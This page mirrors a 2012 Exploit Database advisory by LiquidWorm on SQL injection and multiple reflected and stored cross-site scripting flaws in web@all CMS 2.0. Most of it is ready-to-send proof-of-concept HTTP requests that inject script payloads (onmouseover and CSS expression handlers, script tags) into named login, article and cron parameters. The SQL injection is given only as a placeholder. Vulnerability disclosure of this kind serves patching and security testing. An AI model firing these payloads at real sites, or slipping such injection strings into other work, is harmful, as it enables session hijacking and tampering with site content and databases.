web@all CMS 2.0 – Multiple Vulnerabilities

• Exploit Database
• 106 阅读

• 作者： LiquidWorm
  日期： 2012-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20857/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198

  web@all CMS 2.0 (_order) SQL Injection Vulnerability     Vendor: web@all Product web page: http://www.webatall.org Affected version: 2.0   Summary: web@all is a PHP content management system (CMS). If you know about it,you nearly can use it to do anything.   Desc: The application suffers from an SQL Injection vulnerability. Input passed via the GET parameter &apos;_order&apos; is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.   Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2012-5099 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php     21.08.2012   ---     http://localhost/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article   =============================================================================   web@all CMS 2.0 Multiple Remote XSS Vulnerabilities     Vendor: web@all Product web page: http://www.webatall.org Affected version: 2.0   Summary: web@all is a PHP content management system (CMS). If you know about it,you nearly can use it to do anything.   Desc: web@all CMS suffers from multiple stored and reflected cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user&apos;s browser session in context of an affected site.   ---------------------------------------------------------------------------- * Parameter ** Method ** Module ** Type * ----------------------------------------------------------------------------   1. actPOSTmemberReflected 2. security POSTmemberReflected 3. username POSTmemberReflected 4. id GET article Reflected 5. modGET/POSTmemberReflected 6. _flagGET article Reflected 7. _text[]GET article Reflected 8. _text[alias] GET article Reflected 9. _text[category]GET article Reflected 10. _text[email] GET memberReflected 11. _text[title] GET article Reflected 12. _text[username]GET article Reflected 13. _text[timeadd] GET memberReflected 14. titlePOSTarticle/cronStored 15. descriptionPOSTcronStored   ----------------------------------------------------------------------------   Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2012-5098 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php     21.08.2012   ---     Reflected: ----------     POST /webatall/sys/action.php HTTP/1.1 Content-Length: 154 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)   act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username     POST /webatall/sys/action.php HTTP/1.1 Content-Length: 154 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)   act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username     POST /webatall/sys/action.php HTTP/1.1 Content-Length: 159 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)   act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username     POST /webatall/sys/action.php HTTP/1.1 Content-Length: 147 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)   act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e     GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member       Stored: -------     POST http://localhost/webatall/sys/action.php HTTP/1.1   act sys_add author test category_id 1 content test content_key test copyright test files id lang menu meta_description test meta_keywords test mod article options test status 1 thumbs test title "><script>alert(1);</script>       POST http://localhost/webatall/sys/action.php HTTP/1.1   act sys_add cron delete_unpaid_transaction.php description "><script>alert(2);</script> id menu mod cron run_interval status 1 title "><script>alert(3);</script>